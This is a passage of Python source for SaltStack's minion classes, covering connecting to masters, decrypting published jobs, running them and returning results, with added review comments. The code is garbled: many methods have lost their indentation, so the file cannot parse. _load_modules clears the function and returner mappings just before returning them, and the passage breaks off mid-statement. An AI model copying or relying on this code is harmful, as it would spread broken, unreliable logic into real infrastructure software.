        # request a shorter poll interval than the configured loop_interval,
        # in which case the lowered value is returned to the caller.
        try:
            minion.schedule.eval()
            # Check if scheduler requires lower loop interval than
            # the loop_interval setting
            if minion.schedule.loop_interval < loop_interval:
                loop_interval = minion.schedule.loop_interval
                log.debug(
                    'Overriding loop_interval because of scheduled jobs.'
                )
        except Exception as exc:
            # A broken scheduled job must not take down the minion loop
            log.error(
                'Exception {0} occurred in scheduled job'.format(exc)
            )
        return loop_interval
    def process_beacons(self, functions):
        '''
        Evaluate all of the configured beacons, grab the config again in case
        the pillar or grains changed
        '''
        if 'config.merge' in functions:
            b_conf = functions['config.merge']('beacons')
            if b_conf:
                return self.beacons.process(b_conf)
        return []
class MasterMinion(object):
    '''
    Create a fully loaded minion function object for generic use on the
    master. What makes this class different is that the pillar is
    omitted, otherwise everything else is loaded cleanly.
    '''
    def __init__(
            self,
            opts,
            returners=True,
            states=True,
            rend=True,
            matcher=True,
            whitelist=None):
        # Start from the on-disk minion config, then let the caller's opts
        # override it.
        self.opts = salt.config.minion_config(opts['conf_file'])
        self.opts.update(opts)
        self.whitelist = whitelist
        self.opts['grains'] = salt.loader.grains(opts)
        # Pillar is deliberately left empty (see class docstring)
        self.opts['pillar'] = {}
        # mk_* flags record which optional loaders to build in gen_modules()
        self.mk_returners = returners
        self.mk_states = states
        self.mk_rend = rend
        self.mk_matcher = matcher
        self.gen_modules(initial_load=True)
    def gen_modules(self, initial_load=False):
        '''
        Load all of the modules for the minion
        '''
        # utils must be loaded first: minion_mods() consumes them
        self.utils = salt.loader.utils(self.opts)
        self.functions = salt.loader.minion_mods(
            self.opts,
            utils=self.utils,
            whitelist=self.whitelist,
            initial_load=initial_load)
        if self.mk_returners:
            self.returners = salt.loader.returners(self.opts, self.functions)
        if self.mk_states:
            self.states = salt.loader.states(self.opts, self.functions)
        if self.mk_rend:
            self.rend = salt.loader.render(self.opts, self.functions)
        if self.mk_matcher:
            self.matcher = Matcher(self.opts, self.functions)
        # Expose a reload hook so modules can be refreshed at runtime
        self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
    '''
    Create a multi minion interface, this creates as many minions as are
    defined in the master option and binds each minion object to a respective
    master.
    '''
    # timeout for one of the minions to auth with a master
    MINION_CONNECT_TIMEOUT = 5
    def __init__(self, opts):
        super(MultiMinion, self).__init__(opts)
    def minions(self):
        '''
        Return a dict of minion generators bound to the tune_in method

        dict of master -> minion_mapping, the mapping contains:

            opts: options used to create the minion
            last: last auth attempt time
            auth_wait: time to wait for next auth attempt
            minion: minion object
            generator: generator function (non-blocking tune_in)
        '''
        if not isinstance(self.opts['master'], list):
            log.error(
                'Attempting to start a multimaster system with one master')
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        ret = {}
        for master in set(self.opts['master']):
            s_opts = copy.deepcopy(self.opts)
            s_opts['master'] = master
            s_opts['multimaster'] = True
            ret[master] = {'opts': s_opts,
                           'last': time.time(),
                           'auth_wait': s_opts['acceptance_wait_time']}
            try:
                # Use a per-master loaded_base_name so the module loaders of
                # the individual minions do not collide.
                minion = Minion(
                    s_opts,
                    self.MINION_CONNECT_TIMEOUT,
                    False,
                    'salt.loader.{0}'.format(master))
                ret[master]['minion'] = minion
                ret[master]['generator'] = minion.tune_in_no_block()
            except SaltClientError:
                # Leave the entry without 'minion'/'generator'; tune_in()
                # retries the connection with a backoff.
                log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master))
        return ret
    # Multi Master Tune In
    def tune_in(self):
        '''
        Bind to the masters

        This loop will attempt to create connections to masters it hasn't connected
        to yet, but once the initial connection is made it is up to ZMQ to do the
        reconnect (don't know of an API to get the state here in salt)
        '''
        self._prepare_minion_event_system()
        self.poller.register(self.epull_sock, zmq.POLLIN)
        # Prepare the minion generators
        minions = self.minions()
        loop_interval = int(self.opts['loop_interval'])
        auth_wait = self.opts['acceptance_wait_time']
        max_wait = self.opts['acceptance_wait_time_max']
        while True:
            package = None
            # Run the scheduler for every minion that is already connected
            for minion in six.itervalues(minions):
                if isinstance(minion, dict):
                    if 'minion' in minion:
                        minion = minion['minion']
                    else:
                        continue
                if not hasattr(minion, 'schedule'):
                    continue
                loop_interval = self.process_schedule(minion, loop_interval)
            socks = dict(self.poller.poll(1))
            if socks.get(self.epull_sock) == zmq.POLLIN:
                try:
                    package = self.epull_sock.recv(zmq.NOBLOCK)
                except Exception:
                    pass
            masters = list(minions.keys())
            shuffle(masters)
            # Do stuff per minion that we have
            for master in masters:
                minion = minions[master]
                # if we haven't connected yet, lets attempt some more.
                # make sure to keep separate auth_wait times, since these
                # are separate masters
                if 'generator' not in minion:
                    if time.time() - minion['auth_wait'] > minion['last']:
                        minion['last'] = time.time()
                        if minion['auth_wait'] < max_wait:
                            minion['auth_wait'] += auth_wait
                        try:
                            t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False)
                            minions[master]['minion'] = t_minion
                            minions[master]['generator'] = t_minion.tune_in_no_block()
                            minions[master]['auth_wait'] = self.opts['acceptance_wait_time']
                        except SaltClientError:
                            log.error('Error while bring up minion for multi-master. Is master {0} responding?'.format(master))
                            continue
                    else:
                        continue
                # run scheduled jobs if you have them
                loop_interval = self.process_schedule(minion['minion'], loop_interval)
                # If a minion instance receives event, handle the event on all
                # instances
                if package:
                    try:
                        for target in masters:
                            entry = minions[target]
                            # BUGFIX: dispatch to the Minion object itself.
                            # The old code called handle_event() on the
                            # mapping dict, which raised AttributeError and
                            # was silently swallowed below, so events were
                            # never propagated. Minions that have not
                            # connected yet have no 'minion' entry and are
                            # skipped.
                            if 'minion' in entry:
                                entry['minion'].handle_event(package)
                    except Exception:
                        pass
                    finally:
                        package = None
                # have the Minion class run anything it has to run
                next(minion['generator'])
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
    def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None): # pylint: disable=W0231
        '''
        Pass in the options dict

        timeout/safe are forwarded to eval_master() for the initial
        authentication; loaded_base_name namespaces the module loader (used
        by MultiMinion to keep per-master loaders separate).
        '''
        self._running = None
        self.win_proc = []
        self.loaded_base_name = loaded_base_name
        # Warn if ZMQ < 3.2
        if HAS_ZMQ:
            try:
                zmq_version_info = zmq.zmq_version_info()
            except AttributeError:
                # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
                # using zmq.zmq_version() and build a version info tuple.
                zmq_version_info = tuple(
                    [int(x) for x in zmq.zmq_version().split('.')]
                )
            if zmq_version_info < (3, 2):
                log.warning(
                    'You have a version of ZMQ less than ZMQ 3.2! There are '
                    'known connection keep-alive issues with ZMQ < 3.2 which '
                    'may result in loss of contact with minions. Please '
                    'upgrade your ZMQ!'
                )
        # Late setup the of the opts grains, so we can log from the grains
        # module
        opts['grains'] = salt.loader.grains(opts)
        # evaluate the master to connect to and authenticate with it.
        # NOTE: eval_master() calls MinionBase.__init__() as a side effect,
        # which is what sets self.opts used below.
        opts['master'] = self.eval_master(opts,
                                          timeout,
                                          safe)
        self.opts['pillar'] = salt.pillar.get_pillar(
            opts,
            opts['grains'],
            opts['id'],
            opts['environment']
        ).compile_pillar()
        self.functions, self.returners, self.function_errors = self._load_modules()
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.matcher = Matcher(self.opts, self.functions)
        self.beacons = salt.beacons.Beacon(opts, self.functions)
        uid = salt.utils.get_uid(user=opts.get('user', None))
        self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners)
        # add default scheduling jobs to the minions scheduler
        if 'mine.update' in self.functions:
            log.info('Added mine.update to scheduler')
            self.schedule.add_job({
                '__mine_interval':
                {
                    'function': 'mine.update',
                    'minutes': opts['mine_interval'],
                    'jid_include': True,
                    'maxrunning': 2
                }
            })
        # add master_alive job if enabled
        if self.opts['master_alive_interval'] > 0:
            self.schedule.add_job({
                '__master_alive':
                {
                    'function': 'status.master',
                    'seconds': opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 1,
                    'kwargs': {'master': self.opts['master'],
                               'connected': True}
                }
            })
        # Cache the initial grains for later change detection
        self.grains_cache = self.opts['grains']
        # store your hexid to subscribe to zmq, hash since zmq filters are prefix
        # matches this way we can avoid collisions
        # NOTE(review): sha1() requires bytes on Python 3; this assumes a
        # Python 2 str id -- confirm before porting.
        self.hexid = hashlib.sha1(self.opts['id']).hexdigest()
        if 'proxy' in self.opts['pillar']:
            log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
                                                                                 self.opts['pillar']['proxy']))
            for p in self.opts['pillar']['proxy']:
                log.debug('Starting {0} proxy.'.format(p))
                # Fork a child per proxy; the parent continues the loop, the
                # child starts the proxy minion and exits via clean_die().
                pid = os.fork()
                if pid > 0:
                    continue
                else:
                    proxyminion = ProxyMinion(self.opts)
                    proxyminion.start(self.opts['pillar']['proxy'][p])
                    self.clean_die(signal.SIGTERM, None)
        else:
            log.debug('I am {0} and I am not supposed to start any proxies. '
                      '(Likely not a problem)'.format(self.opts['id']))
# __init__() from MinionBase is called in Minion.eval_master()
    def eval_master(self,
                    opts,
                    timeout=60,
                    safe=True,
                    failed=False):
        '''
        Evaluates and returns the current master address. In standard mode, just calls
        authenticate() with the given master address.

        With master_type=func evaluates the current master address from the given
        module and then calls authenticate().

        With master_type=failover takes the list of masters and loops through them.
        The first one that allows the minion to connect is used to authenticate() and
        then returned. If this function is called outside the minions initialization
        phase (for example from the minions main event-loop when a master connection
        loss was detected), 'failed' should be set to True. The current
        (possibly failed) master will then be removed from the list of masters.

        Side effect: calls MinionBase.__init__() (setting self.opts) before
        authenticating, and sets self.connected. Exits the process on
        configuration errors or a rejected single-master connection.
        '''
        # check if master_type was altered from its default
        if opts['master_type'] != 'str':
            # check for a valid keyword
            if opts['master_type'] == 'func':
                # split module and function and try loading the module
                mod, fun = opts['master'].split('.')
                try:
                    master_mod = salt.loader.raw_mod(opts, mod, fun)
                    if not master_mod:
                        raise TypeError
                    # we take whatever the module returns as master address
                    opts['master'] = master_mod[mod + '.' + fun]()
                except TypeError:
                    msg = ('Failed to evaluate master address from '
                           'module \'{0}\''.format(opts['master']))
                    log.error(msg)
                    sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                log.info('Evaluated master from module: {0}'.format(master_mod))
            # if failover is set, master has to be of type list
            elif opts['master_type'] == 'failover':
                if isinstance(opts['master'], list):
                    log.info('Got list of available master addresses:'
                             ' {0}'.format(opts['master']))
                    if opts['master_shuffle']:
                        shuffle(opts['master'])
                elif opts['__role'] == 'syndic':
                    log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
                # if failed=True, the minion was previously connected
                # we're probably called from the minions main-event-loop
                # because a master connection loss was detected. remove
                # the possibly failed master from the list of masters.
                elif failed:
                    log.info('Removing possibly failed master {0} from list of'
                             ' masters'.format(opts['master']))
                    # create new list of master with the possibly failed one removed
                    opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
                else:
                    msg = ('master_type set to \'failover\' but \'master\' '
                           'is not of type list but of type '
                           '{0}'.format(type(opts['master'])))
                    log.error(msg)
                    sys.exit(salt.defaults.exitcodes.EX_GENERIC)
            else:
                msg = ('Invalid keyword \'{0}\' for variable '
                       '\'master_type\''.format(opts['master_type']))
                log.error(msg)
                sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        # if we have a list of masters, loop through them and be
        # happy with the first one that allows us to connect
        if isinstance(opts['master'], list):
            conn = False
            # shuffle the masters and then loop through them
            local_masters = copy.copy(opts['master'])
            for master in local_masters:
                opts['master'] = master
                opts.update(resolve_dns(opts))
                # MinionBase.__init__() must run per candidate so self.opts
                # reflects the master currently being tried.
                super(Minion, self).__init__(opts)
                # on first run, update self.opts with the whole master list
                # to enable a minion to re-use old masters if they get fixed
                if 'master_list' not in self.opts:
                    self.opts['master_list'] = local_masters
                try:
                    # 'full' means the master rejected us for being at
                    # capacity; anything else counts as connected.
                    if self.authenticate(timeout, safe) != 'full':
                        conn = True
                        break
                except SaltClientError:
                    msg = ('Master {0} could not be reached, trying '
                           'next master (if any)'.format(opts['master']))
                    log.info(msg)
                    continue
            if not conn:
                self.connected = False
                msg = ('No master could be reached or all masters denied '
                       'the minions connection attempt.')
                log.error(msg)
            else:
                self.connected = True
                return opts['master']
        # single master sign in
        else:
            opts.update(resolve_dns(opts))
            super(Minion, self).__init__(opts)
            if self.authenticate(timeout, safe) == 'full':
                self.connected = False
                msg = ('master {0} rejected the minions connection because too '
                       'many minions are already connected.'.format(opts['master']))
                log.error(msg)
                sys.exit(salt.defaults.exitcodes.EX_GENERIC)
            else:
                self.connected = True
                return opts['master']
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing errored: {0}. No beacons will be procssed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data)
self.handle_event(event)
self.epub_sock.send(event)
    def _load_modules(self, force_refresh=False, notify=False):
        '''
        Return the functions and the returners loaded up from the loader
        module

        Returns a ``(functions, returners, errors)`` tuple; *errors* maps
        module names to the load errors reported under '_errors'.
        '''
        # if this is a *nix system AND modules_max_memory is set, lets enforce
        # a memory limit on module imports
        # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
        modules_max_memory = False
        if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
            log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
            modules_max_memory = True
            old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
            # Allow current usage (rss + vms) plus the configured headroom
            rss, vms = psutil.Process(os.getpid()).get_memory_info()
            mem_limit = rss + vms + self.opts['modules_max_memory']
            resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
        elif self.opts.get('modules_max_memory', -1) > 0:
            if not HAS_PSUTIL:
                log.error('Unable to enforce modules_max_memory because psutil is missing')
            if not HAS_RESOURCE:
                log.error('Unable to enforce modules_max_memory because resource is missing')
        self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
        self.utils = salt.loader.utils(self.opts)
        if self.opts.get('multimaster', False):
            # Deep-copy opts so per-master loaders don't share mutable state
            s_opts = copy.deepcopy(self.opts)
            functions = salt.loader.minion_mods(s_opts, utils=self.utils,
                                                loaded_base_name=self.loaded_base_name, notify=notify)
        else:
            functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
        returners = salt.loader.returners(self.opts, functions)
        errors = {}
        if '_errors' in functions:
            errors = functions['_errors']
            functions.pop('_errors')
        # NOTE(review): these two clear() calls empty the freshly built
        # mappings right before they are returned. This only makes sense if
        # the loader objects repopulate lazily on access (LazyLoader-style);
        # confirm that is the case, otherwise this hands back empty dicts.
        functions.clear()
        returners.clear()
        # we're done, reset the limits!
        if modules_max_memory is True:
            resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
        return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
    def _handle_aes(self, load, sig=None):
        '''
        Takes the AES encrypted load, checks the signature if pub signatures
        are turned on, decrypts it, and runs the encapsulated instructions
        '''
        # Verify that the signature is valid
        master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
        if sig and self.functions['config.get']('sign_pub_messages'):
            if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
                raise AuthenticationError('Message signature failed to validate.')
        try:
            data = self.crypticle.loads(load)
        except AuthenticationError:
            # decryption of the payload failed, try to re-auth and decrypt
            # once more with the refreshed session key
            self.authenticate()
            data = self.crypticle.loads(load)
        # Verify that the publication is valid
        if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
           or 'arg' not in data:
            return
        # Verify that the publication applies to this minion
        # It's important to note that the master does some pre-processing
        # to determine which minions to send a request to. So for example,
        # a "salt -G 'grain_key:grain_val' test.ping" will invoke some
        # pre-processing on the master and this minion should not see the
        # publication if the master does not determine that it should.
        if 'tgt_type' in data:
            match_func = getattr(self.matcher,
                                 '{0}_match'.format(data['tgt_type']), None)
            if match_func is None:
                # Unknown target type: silently ignore the publication
                return
            if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
                # These matchers honor a configurable key delimiter
                delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM)
                if not match_func(data['tgt'], delimiter=delimiter):
                    return
            elif not match_func(data['tgt']):
                return
        else:
            # No tgt_type given: fall back to glob matching on the minion id
            if not self.matcher.glob_match(data['tgt']):
                return
        # If the minion does not have the function, don't execute,
        # this prevents minions that could not load a minion module
        # from returning a predictable exception
        #if data['fun'] not in self.functions:
        #    return
        if 'user' in data:
            log.info(
                'User {0[user]} Executing command {0[fun]} with jid ' # pylint: disable=W1307
                '{0[jid]}'.format(data)
            )
        else:
            log.info(
                'Executing command {0[fun]} with jid {0[jid]}'.format(data) # pylint: disable=W1307
            )
        log.debug('Command details {0}'.format(data))
        self._handle_decoded_payload(data)
    def _handle_pub(self, load):
        '''
        Handle public key payloads

        Currently a no-op placeholder: 'pub'-encrypted payloads are accepted
        and discarded.
        '''
        pass
    def _handle_clear(self, load, sig=None):
        '''
        Handle un-encrypted transmissions

        Currently a no-op placeholder: clear-text payloads are accepted and
        discarded.
        '''
        pass
    def _handle_decoded_payload(self, data):
        '''
        Override this method if you wish to handle the decoded data
        differently.

        Dispatches the job to _thread_return (single function) or
        _thread_multi_return (list of functions) in a new process or thread,
        depending on the 'multiprocessing' opt.
        '''
        if isinstance(data['fun'], six.string_types):
            if data['fun'] == 'sys.reload_modules':
                # Reload in-process so the refreshed functions are visible to
                # the scheduler as well
                self.functions, self.returners, self.function_errors = self._load_modules()
                self.schedule.functions = self.functions
                self.schedule.returners = self.returners
        if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
            target = Minion._thread_multi_return
        else:
            target = Minion._thread_return
        # We stash an instance references to allow for the socket
        # communication in Windows. You can't pickle functions, and thus
        # python needs to be able to reconstruct the reference on the other
        # side.
        instance = self
        if self.opts['multiprocessing']:
            if sys.platform.startswith('win'):
                # let python reconstruct the minion on the other side if we're
                # running on windows
                instance = None
            process = multiprocessing.Process(
                target=target, args=(instance, self.opts, data)
            )
        else:
            process = threading.Thread(
                target=target,
                args=(instance, self.opts, data),
                name=data['jid']
            )
        process.start()
        # On non-Windows platforms the worker (which daemonizes itself when
        # multiprocessing) is joined here; on Windows the process handle is
        # kept so it can be cleaned up later.
        if not sys.platform.startswith('win'):
            process.join()
        else:
            self.win_proc.append(process)
    @classmethod
    def _thread_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target, start the actual
        minion side execution.

        Executes the single function named in data['fun'], records the job in
        the proc dir, publishes the result back to the master and runs any
        requested returners.
        '''
        # this seems awkward at first, but it's a workaround for Windows
        # multiprocessing communication.
        if not minion_instance:
            minion_instance = cls(opts)
        fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
        if opts['multiprocessing']:
            salt.utils.daemonize_if(opts)
        salt.utils.appendproctitle(data['jid'])
        # Record the running job (pid + publish data) in the proc dir so
        # saltutil.running and friends can find it
        sdata = {'pid': os.getpid()}
        sdata.update(data)
        log.info('Starting a new job with PID {0}'.format(sdata['pid']))
        with salt.utils.fopen(fn_, 'w+b') as fp_:
            fp_.write(minion_instance.serial.dumps(sdata))
        ret = {'success': False}
        function_name = data['fun']
        if function_name in minion_instance.functions:
            try:
                func = minion_instance.functions[data['fun']]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'],
                    data)
                minion_instance.functions.pack['__context__']['retcode'] = 0
                if opts.get('sudo_user', ''):
                    sudo_runas = opts.get('sudo_user')
                    # NOTE(review): if sudo_user is set but sudo.salt_call is
                    # not loaded, return_data stays unbound and the access
                    # below raises NameError (caught by the generic handler).
                    if 'sudo.salt_call' in minion_instance.functions:
                        return_data = minion_instance.functions['sudo.salt_call'](
                                sudo_runas,
                                data['fun'],
                                *args,
                                **kwargs)
                else:
                    return_data = func(*args, **kwargs)
                if isinstance(return_data, types.GeneratorType):
                    # Stream generator output: fire a progress event per
                    # yielded chunk and accumulate the final return value
                    # (dict merge when possible, list otherwise).
                    ind = 0
                    iret = {}
                    for single in return_data:
                        if isinstance(single, dict) and isinstance(iret, dict):
                            iret.update(single)
                        else:
                            if not iret:
                                iret = []
                            iret.append(single)
                        tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
                        event_data = {'return': single}
                        minion_instance._fire_master(event_data, tag)
                        ind += 1
                    ret['return'] = iret
                else:
                    ret['return'] = return_data
                ret['retcode'] = minion_instance.functions.pack['__context__'].get(
                    'retcode',
                    0
                )
                ret['success'] = True
            except CommandNotFoundError as exc:
                msg = 'Command required for {0!r} not found'.format(
                    function_name
                )
                log.debug(msg, exc_info=True)
                ret['return'] = '{0}: {1}'.format(msg, exc)
                ret['out'] = 'nested'
            except CommandExecutionError as exc:
                log.error(
                    'A command in {0!r} had a problem: {1}'.format(
                        function_name,
                        exc
                    ),
                    exc_info_on_loglevel=logging.DEBUG
                )
                ret['return'] = 'ERROR: {0}'.format(exc)
                ret['out'] = 'nested'
            except SaltInvocationError as exc:
                log.error(
                    'Problem executing {0!r}: {1}'.format(
                        function_name,
                        exc
                    ),
                    exc_info_on_loglevel=logging.DEBUG
                )
                ret['return'] = 'ERROR executing {0!r}: {1}'.format(
                    function_name, exc
                )
                ret['out'] = 'nested'
            except TypeError as exc:
                # Most commonly wrong/missing arguments; include the
                # function's docstring to help the caller fix the invocation
                msg = 'Passed invalid arguments: {0}\n{1}'.format(exc, func.__doc__)
                log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
                ret['return'] = msg
                ret['out'] = 'nested'
            except Exception:
                msg = 'The minion function caused an exception'
                log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
                salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
                ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
                ret['out'] = 'nested'
        else:
            # Function not loaded: report why, including any module load
            # errors recorded for the function's module
            ret['return'] = minion_instance.functions.missing_fun_string(function_name)
            mod_name = function_name.split('.')[0]
            if mod_name in minion_instance.function_errors:
                ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
            ret['success'] = False
            ret['retcode'] = 254
            ret['out'] = 'nested'
        ret['jid'] = data['jid']
        ret['fun'] = data['fun']
        ret['fun_args'] = data['arg']
        if 'master_id' in data:
            ret['master_id'] = data['master_id']
        if 'metadata' in data:
            if isinstance(data['metadata'], dict):
                ret['metadata'] = data['metadata']
            else:
                log.warning('The metadata parameter must be a dictionary. Ignoring.')
        # Publish the result back to the master
        minion_instance._return_pub(ret)
        if data['ret']:
            # Run any returners requested by the publish
            if 'ret_config' in data:
                ret['ret_config'] = data['ret_config']
            ret['id'] = opts['id']
            for returner in set(data['ret'].split(',')):
                try:
                    minion_instance.returners['{0}.returner'.format(
                        returner
                    )](ret)
                except Exception as exc:
                    log.error(
                        'The return failed for job {0} {1}'.format(
                            data['jid'],
                            exc
                        )
                    )
                    log.error(traceback.format_exc())
    @classmethod
    def _thread_multi_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target, start the actual
        minion side execution.

        Variant of _thread_return for compound publications: data['fun'] is a
        list of function names with data['arg'] holding the argument list for
        each, matched by index.
        '''
        salt.utils.appendproctitle(data['jid'])
        # this seems awkward at first, but it's a workaround for Windows
        # multiprocessing communication.
        if not minion_instance:
            minion_instance = cls(opts)
        ret = {
            'return': {},
            'success': {},
        }
        # data['fun'][ind] pairs with data['arg'][ind]
        for ind in range(0, len(data['fun'])):
            ret['success'][data['fun'][ind]] = False
            try:
                func = minion_instance.functions[data['fun'][ind]]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'][ind],
                    data)
                ret['return'][data['fun'][ind]] = func(*args, **kwargs)
                ret['success'][data['fun'][ind]] = True
            except Exception as exc:
                # One failing function must not abort the rest; record the
                # traceback as that function's return value
                trb = traceback.format_exc()
                log.warning(
                    'The minion function caused an exception: {0}'.format(
                        exc
                    )
                )
                ret['return'][data['fun'][ind]] = trb
            ret['jid'] = data['jid']
            ret['fun'] = data['fun']
            ret['fun_args'] = data['arg']
        if 'metadata' in data:
            ret['metadata'] = data['metadata']
        # Publish the combined result back to the master
        minion_instance._return_pub(ret)
        if data['ret']:
            if 'ret_config' in data:
                ret['ret_config'] = data['ret_config']
            for returner in set(data['ret'].split(',')):
                ret['id'] = opts['id']
                try:
                    minion_instance.returners['{0}.returner'.format(
                        returner
                    )](ret)
                except Exception as exc:
                    log.error(
                        'The return failed for job {0} {1}'.format(
                            data['jid'],
                            exc
                        )
                    )
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
    '''
    Return the data from the executed command to the master server.

    :param ret: dict of job results; carries 'jid'/'fun' (or the
        syndic-style '__jid__'/'__fun__' keys)
    :param ret_cmd: master-side command, '_return' or '_syndic_return'
    :param timeout: seconds to wait for the master to acknowledge
    :return: the master's reply, or '' if the send timed out
    '''
    jid = ret.get('jid', ret.get('__jid__'))
    fun = ret.get('fun', ret.get('__fun__'))
    if self.opts['multiprocessing']:
        # Remove the proc-dir marker file for this job, if it still exists
        fn_ = os.path.join(self.proc_dir, jid)
        if os.path.isfile(fn_):
            try:
                os.remove(fn_)
            except (OSError, IOError):
                # The file is gone already
                pass
    log.info('Returning information for job: {0}'.format(jid))
    channel = salt.transport.Channel.factory(self.opts)
    if ret_cmd == '_syndic_return':
        # Syndic returns carry routing metadata; all non-dunder keys of
        # ret are folded into load['return']
        load = {'cmd': ret_cmd,
                'id': self.opts['id'],
                'jid': jid,
                'fun': fun,
                'arg': ret.get('arg'),
                'tgt': ret.get('tgt'),
                'tgt_type': ret.get('tgt_type'),
                'load': ret.get('__load__')}
        if '__master_id__' in ret:
            load['master_id'] = ret['__master_id__']
        load['return'] = {}
        for key, value in six.iteritems(ret):
            if key.startswith('__'):
                continue
            load['return'][key] = value
    else:
        load = {'cmd': ret_cmd,
                'id': self.opts['id']}
        for key, value in six.iteritems(ret):
            load[key] = value
    if 'out' in ret:
        if isinstance(ret['out'], six.string_types):
            load['out'] = ret['out']
        else:
            log.error('Invalid outputter {0}. This is likely a bug.'
                      .format(ret['out']))
    else:
        # Fall back to the outputter declared by the executed function
        try:
            oput = self.functions[fun].__outputter__
        except (KeyError, AttributeError, TypeError):
            pass
        else:
            if isinstance(oput, six.string_types):
                load['out'] = oput
    if self.opts['cache_jobs']:
        # Local job cache has been enabled
        fn_ = os.path.join(
            self.opts['cachedir'],
            'minion_jobs',
            load['jid'],
            'return.p')
        jdir = os.path.dirname(fn_)
        if not os.path.isdir(jdir):
            os.makedirs(jdir)
        # Fix: use a context manager so the cache file handle is closed
        # deterministically (the old code leaked it until GC).
        with salt.utils.fopen(fn_, 'w+b') as fp_:
            fp_.write(self.serial.dumps(ret))
    try:
        ret_val = channel.send(load, timeout=timeout)
    except SaltReqTimeoutError:
        msg = ('The minion failed to return the job information for job '
               '{0}. This is often due to the master being shut down or '
               'overloaded. If the master is running consider increasing '
               'the worker_threads value.').format(jid)
        # log.warn is a deprecated alias of log.warning
        log.warning(msg)
        return ''
    log.trace('ret_val = {0}'.format(ret_val))
    return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
    '''
    Push the configured TCP keepalive options onto the zmq socket, when
    this zmq build exposes them.
    '''
    if not hasattr(zmq, 'TCP_KEEPALIVE'):
        return
    # (zmq option name, minion config key) pairs, applied in order
    keepalive_options = (
